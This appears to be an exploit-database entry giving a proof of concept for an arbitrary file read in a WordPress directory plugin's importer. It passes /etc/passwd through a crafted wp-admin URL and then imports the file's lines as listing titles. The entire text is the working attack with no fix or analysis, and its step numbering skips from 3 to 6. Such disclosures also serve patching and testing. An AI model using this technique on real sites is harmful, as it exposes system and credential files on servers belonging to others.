Share
## https://sploitus.com/exploit?id=WPEX-ID:9DA6EEDE-10D0-4609-8B97-4A5D38FA8E69
This PoC will work on Linux systems.

1. Navigate to the URL path: /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=/etc/passwd&delimiter=;
2.. You will be presented with the first couple lines of the /etc/passwd file
3. In the "map to field" section, select "Title" and click "Run Importer"
6. You will then be presented with a bunch of "pending" listings, with the title for each listing presenting a new line of content from the `/etc/passwd` file